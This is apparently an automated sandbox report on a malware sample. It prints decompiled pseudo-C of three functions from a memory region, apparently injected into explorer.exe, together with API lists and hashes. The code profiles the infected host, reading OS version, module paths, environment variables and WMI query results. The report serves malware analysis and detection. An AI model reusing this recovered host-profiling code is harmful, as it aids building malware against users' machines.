                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x293f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x293f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








                  0x0008b337
                  0x0008b33f
                  0x0008b344
                  0x0008b34a
                  0x0008b34e
                  0x0008b350
                  0x0008b355
                  0x0008b35e
                  0x0008b362
                  0x0008b362
                  0x0008b36a
                  0x00000000
                  0x0008b36d
                  0x0008b371

                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x293f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x293fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x293fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x293f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x293f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x293f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x293f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x293f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x293f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































                  0x0008d01f
                  0x0008d029
                  0x0008d035
                  0x0008d03a
                  0x0008d03f
                  0x0008d3ff
                  0x0008d3ff
                  0x0008d04c
                  0x0008d052
                  0x0008d057
                  0x0008d05d
                  0x0008d06d
                  0x0008d079
                  0x0008d079
                  0x0008d082
                  0x0008d088
                  0x0008d08a
                  0x0008d093
                  0x0008d093
                  0x0008d09f
                  0x0008d0a3
                  0x0008d0a8
                  0x0008d0ae
                  0x0008d0b7
                  0x0008d0c5
                  0x0008d0cc
                  0x0008d0d1
                  0x0008d0d1
                  0x0008d0d2
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0d8
                  0x0008d0e3
                  0x0008d0f1
                  0x0008d0f7
                  0x0008d0fb
                  0x0008d101
                  0x0008d108
                  0x0008d10f
                  0x0008d113
                  0x0008d11a
                  0x0008d11b
                  0x0008d128
                  0x0008d12a
                  0x0008d12f
                  0x0008d13c
                  0x0008d13e
                  0x0008d13e
                  0x0008d140
                  0x0008d14a
                  0x0008d156
                  0x0008d166
                  0x0008d16c
                  0x0008d172
                  0x0008d174
                  0x0008d185
                  0x0008d18b
                  0x0008d191
                  0x0008d196
                  0x0008d19c
                  0x0008d1a2
                  0x0008d1a7
                  0x0008d1ac
                  0x0008d1ac
                  0x0008d1b2
                  0x0008d1b2
                  0x0008d1bb
                  0x0008d1c7
                  0x0008d1cf
                  0x0008d1d3
                  0x0008d1d3
                  0x0008d1cf
                  0x0008d1d7
                  0x0008d1dd
                  0x0008d1e3
                  0x0008d1ea
                  0x0008d1fb
                  0x0008d201
                  0x0008d209
                  0x0008d210
                  0x0008d223
                  0x0008d229
                  0x0008d22e
                  0x0008d231
                  0x0008d234
                  0x0008d23a
                  0x0008d240
                  0x0008d242
                  0x0008d248
                  0x0008d251
                  0x0008d254
                  0x0008d254
                  0x0008d257
                  0x0008d25f
                  0x0008d26a
                  0x0008d270
                  0x0008d261
                  0x0008d263
                  0x0008d263
                  0x0008d279
                  0x0008d279
                  0x0008d27f
                  0x0008d287
                  0x0008d292
                  0x0008d297
                  0x0008d29d
                  0x0008d29f
                  0x0008d2ac
                  0x0008d2ad
                  0x0008d2ae
                  0x0008d2b9
                  0x0008d2bb
                  0x0008d2c2
                  0x0008d2c2
                  0x0008d2cc
                  0x0008d2d1
                  0x0008d2d6
                  0x0008d2d6
                  0x0008d2dc
                  0x0008d2e3
                  0x0008d2e4
                  0x0008d2f1
                  0x0008d304
                  0x0008d309
                  0x0008d30e
                  0x0008d317
                  0x0008d317
                  0x0008d31d
                  0x0008d322
                  0x0008d328
                  0x0008d32e
                  0x0008d333
                  0x0008d33c
                  0x0008d33e
                  0x0008d345
                  0x0008d345
                  0x0008d34b
                  0x0008d353
                  0x0008d358
                  0x0008d359
                  0x0008d35e
                  0x0008d367
                  0x0008d369
                  0x0008d374
                  0x0008d374
                  0x0008d37d
                  0x0008d385
                  0x0008d38c
                  0x0008d391
                  0x0008d3a0
                  0x0008d3b8
                  0x0008d3bf
                  0x0008d3cd
                  0x0008d3df
                  0x0008d3e6
                  0x0008d3f3
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                  0x0008db45
                  0x0008db4b
                  0x0008db52
                  0x0008db55
                  0x0008db58
                  0x0008db5d
                  0x0008db5f
                  0x0008db64
                  0x0008dfac
                  0x0008dfac
                  0x0008db71
                  0x0008db73
                  0x0008db76
                  0x0008db79
                  0x0008df91
                  0x0008df97
                  0x0008dfa1
                  0x00000000
                  0x0008dfa6
                  0x0008db84
                  0x0008db8b
                  0x0008db92
                  0x0008db95
                  0x0008db9a
                  0x0008db9c
                  0x0008db9f
                  0x0008dba2
                  0x0008dba3
                  0x0008dbac
                  0x0008dbb2
                  0x0008dbb5
                  0x0008dbbe
                  0x0008dbc3
                  0x0008dbc8
                  0x0008dbdf
                  0x0008dbec
                  0x0008dbef
                  0x0008dbf6
                  0x0008dbfb
                  0x0008dc02
                  0x0008dc07
                  0x0008dc0e
                  0x0008dc10
                  0x0008dc1c
                  0x0008dc1f
                  0x0008dc21
                  0x0008df81
                  0x0008df82
                  0x0008df8b
                  0x00000000
                  0x0008df8b
                  0x0008dc27
                  0x0008dc2a
                  0x0008dc2d
                  0x0008dc30
                  0x0008dc32
                  0x0008df4d
                  0x0008df50
                  0x0008df53
                  0x0008df55
                  0x0008df77
                  0x0008df7c
                  0x0008df57
                  0x0008df5a
                  0x0008df65
                  0x0008df6c
                  0x0008df6c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dc38
                  0x0008dc38
                  0x0008dc4a
                  0x0008dc4d
                  0x0008dc4f
                  0x00000000
                  0x00000000
                  0x0008dc57
                  0x0008dc5a
                  0x0008dc5d
                  0x0008dc60
                  0x0008dc63
                  0x0008dc66
                  0x00000000
                  0x00000000
                  0x0008dc6c
                  0x0008dc7a
                  0x0008dc7d
                  0x0008dc7f
                  0x0008dc98
                  0x0008dca7
                  0x0008dcaf
                  0x0008dcaf
                  0x0008dcb2
                  0x0008dcb9
                  0x0008dcbd
                  0x0008dcc3
                  0x0008dcc5
                  0x0008df35
                  0x0008df3b
                  0x0008df41
                  0x0008df44
                  0x0008df44
                  0x00000000
                  0x0008df44
                  0x0008dcd4
                  0x0008dce8
                  0x0008dcec
                  0x0008dcee
                  0x0008dcf3
                  0x0008df02
                  0x0008df08
                  0x0008df13
                  0x0008df1e
                  0x0008df24
                  0x0008df2a
                  0x0008df2d
                  0x00000000
                  0x0008df2d
                  0x0008dcf9
                  0x0008ded0
                  0x0008ded0
                  0x0008ded3
                  0x0008ded6
                  0x00000000
                  0x00000000
                  0x0008dd01
                  0x0008dd09
                  0x0008dd10
                  0x0008dd16
                  0x0008dd18
                  0x00000000
                  0x00000000
                  0x0008dd21
                  0x0008dd36
                  0x0008dd3c
                  0x0008dd45
                  0x0008dd48
                  0x0008dd4b
                  0x0008dd4d
                  0x0008dec3
                  0x0008dec6
                  0x0008decf
                  0x0008decf
                  0x00000000
                  0x0008decf
                  0x0008dd5d
                  0x0008dd60
                  0x0008dd67
                  0x0008dd6d
                  0x0008dd70
                  0x0008dd73
                  0x0008dd76
                  0x0008dd79
                  0x0008ddb5
                  0x0008ddb5
                  0x0008ddb8
                  0x0008de64
                  0x0008de78
                  0x0008de88
                  0x0008de8c
                  0x0008de8e
                  0x0008dea5
                  0x0008dea9
                  0x0008deb2
                  0x0008debd
                  0x00000000
                  0x0008debd
                  0x0008de94
                  0x0008de95
                  0x0008de9a
                  0x0008de9a
                  0x0008de9c
                  0x0008de9d
                  0x0008dea2
                  0x00000000
                  0x0008dea2
                  0x0008ddbe
                  0x0008ddbe
                  0x0008ddc1
                  0x0008de2c
                  0x0008de40
                  0x0008de50
                  0x0008de54
                  0x0008de56
                  0x00000000
                  0x00000000
                  0x0008de5c
                  0x0008de5d
                  0x00000000
                  0x0008de5d
                  0x0008ddc3
                  0x0008ddc3
                  0x0008ddc6
                  0x00000000
                  0x00000000
                  0x0008ddc8
                  0x0008ddcb
                  0x00000000
                  0x00000000
                  0x0008ddcd
                  0x0008ddcd
                  0x0008ddd3
                  0x0008ddef
                  0x0008ddfe
                  0x0008de07
                  0x0008de0c
                  0x0008de0f
                  0x0008de15
                  0x0008de15
                  0x0008de1a
                  0x0008de26
                  0x00000000
                  0x0008de26
                  0x0008ddd8
                  0x00000000
                  0x0008ddd8
                  0x0008dd7b
                  0x0008dda2
                  0x0008dda7
                  0x0008ddac
                  0x0008ddae
                  0x0008ddae
                  0x00000000
                  0x0008ddac
                  0x0008dd7d
                  0x0008dd7d
                  0x0008dd80
                  0x00000000
                  0x00000000
                  0x0008dd86
                  0x0008dd86
                  0x0008dd89
                  0x00000000
                  0x00000000
                  0x0008dd8f
                  0x0008dd8f
                  0x0008dd92
                  0x00000000
                  0x00000000
                  0x0008dd98
                  0x0008dd9b
                  0x00000000
                  0x00000000
                  0x0008dd9d
                  0x00000000
                  0x0008dd9d
                  0x0008dedf
                  0x0008dee5
                  0x0008deeb
                  0x0008deee
                  0x0008def1
                  0x0008def1
                  0x0008def4
                  0x0008def5
                  0x0008def8
                  0x0008defa
                  0x00000000
                  0x00000000
                  0x0008df4a
                  0x0008df4a
                  0x00000000
                  0x0008df4a
                  0x0008dc81
                  0x0008dc87
                  0x00000000
                  0x0008dc87
                  0x0008df47
                  0x00000000
                  0x0008dbca
                  0x0008dbcf
                  0x0008dbd4
                  0x00000000
                  0x0008dbd8

                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
